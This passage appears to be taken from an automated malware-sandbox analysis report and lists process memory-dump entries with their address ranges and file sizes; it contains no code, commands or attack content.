                                                                                                                      • memory/4112-228-0x0000000002D80000-0x0000000002D82000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4112-240-0x0000000002D85000-0x0000000002D86000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4112-236-0x0000000002D82000-0x0000000002D84000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4140-242-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4140-245-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/4140-246-0x00000000021A0000-0x00000000021B2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        72KB

                                                                                                                      • memory/4176-253-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        288KB

                                                                                                                      • memory/4176-229-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4176-232-0x0000000000D50000-0x0000000000D5D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        52KB

                                                                                                                      • memory/4184-363-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4236-342-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4376-312-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4420-353-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4456-306-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4492-349-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4496-359-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4536-366-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4560-354-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4612-247-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4612-284-0x0000000002360000-0x00000000023A4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        272KB

                                                                                                                      • memory/4612-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/4612-191-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4640-365-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4644-195-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4644-198-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4696-351-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4704-250-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4704-241-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4732-203-0x0000000002960000-0x0000000002962000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4732-200-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4768-364-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4776-254-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4788-356-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4796-346-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4868-347-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4876-367-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4896-344-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4912-361-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4920-357-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4940-345-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4940-335-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4940-362-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4972-208-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        88KB

                                                                                                                      • memory/4972-206-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4996-339-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/4996-331-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5000-336-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5004-210-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5004-214-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5064-237-0x00000000029C4000-0x00000000029C5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5064-235-0x00000000029C2000-0x00000000029C4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/5064-238-0x00000000029C5000-0x00000000029C7000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/5064-215-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5064-227-0x00000000029C0000-0x00000000029C2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/5076-216-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5076-226-0x0000000002A20000-0x0000000002A22000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/5124-257-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        3.5MB

                                                                                                                      • memory/5124-256-0x00000001401FBC30-mapping.dmp
                                                                                                                      • memory/5124-255-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        3.5MB

                                                                                                                      • memory/5128-315-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5164-307-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5332-350-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5336-324-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5348-258-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5364-259-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.0MB

                                                                                                                      • memory/5364-263-0x00000001402CA898-mapping.dmp
                                                                                                                      • memory/5364-265-0x000001ECF2750000-0x000001ECF2764000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        80KB

                                                                                                                      • memory/5364-271-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.0MB

                                                                                                                      • memory/5484-343-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5488-264-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5508-278-0x0000000004605000-0x0000000004706000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/5508-266-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5680-360-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5824-289-0x0000000000401480-mapping.dmp
                                                                                                                      • memory/5824-287-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        284KB

                                                                                                                      • memory/5876-348-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5912-295-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5928-352-0x0000000000402F68-mapping.dmp
                                                                                                                      • memory/6000-358-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6096-322-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6128-302-0x0000000000000000-mapping.dmp